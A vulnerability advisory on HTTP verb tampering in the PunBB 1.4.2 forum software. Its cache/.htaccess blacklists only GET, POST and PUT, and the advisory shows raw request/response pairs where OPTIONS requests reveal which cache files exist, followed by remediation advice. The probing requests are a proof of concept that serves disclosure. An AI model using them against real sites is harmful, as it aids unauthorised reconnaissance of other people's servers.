PunBB 1.4.2 HTTP VERB Tampering

===============================================================
Vulnerable software: PunBB 1.4.2
Official site: http://punbb.informer.com/
Vuln: HTTP Verb Tampering.
Checked version: PunBB 1.4.2
===============================================================

About software:
===============================================================

PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License.
Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards.
PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller,
semantically correct XHTML-compliant pages.

*Copy/paste from official wiki.*
===============================================================
About vuln:

punbb-1.4.2 is vulnerable to HTTP VERB Tampering because it tries restrict HTTP access to its own cache/ directory
using insecure manner.
I'm pretty sure we can call the following approach : "Black listing"
But as we all know black listing approach sucks as always.
Take a look:

==========/punbb-1.4.2/cache/.htaccess=====

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
=====================================
Note: THIS file default shipped with latest 1.4.2 version.
Other versions may also affected but i didn't checked.

Using the following .htaccess file in its cache/ directory punbb denies  HTTP GET,POST and PUT request(s) to the files in cache directory.
But what about other HTTP method?
Here is few "fingerprinting" methods against real sites:(Notice status codes)

===============================================================
TEST 1:  GET method

REQUEST METHOD: GET
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive


Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:26:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>
===============================================================

TEST 2
REQUEST METHOD: POST
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 42


$_POST data to send:

&id=this is a test for HTTP VERB tampering



Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>



===============================================================

TEST 3: Fun begins.
Request method:   OPTIONS
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0


Server returns:
HTTP/1.1 200 OK         <===========Notice
Date: Tue, 02 Apr 2013 00:32:09 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html



======================================

TEST 4: Notice again status code: 404
Method: OPTIONS
URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php


Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0



Server returns:

HTTP/1.1 404 Not Found
Date: Tue, 02 Apr 2013 00:36:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this server.</p>
</body></html>


======================================


Using the following way(s) attacker may in ex:
Access cache files.In itself this issuse may open new attacks/or give more chances for attacker.

Do not use black listing approach instead of use whilelisting.
So don't use Limit directive in your .htaccess file.
In this case instead of simple  *deny from all*   will do it's own job.(If i'm wrong please correct me)



=========================================
               KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
http://exploit-db.com/

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
===========================================

/AkaStep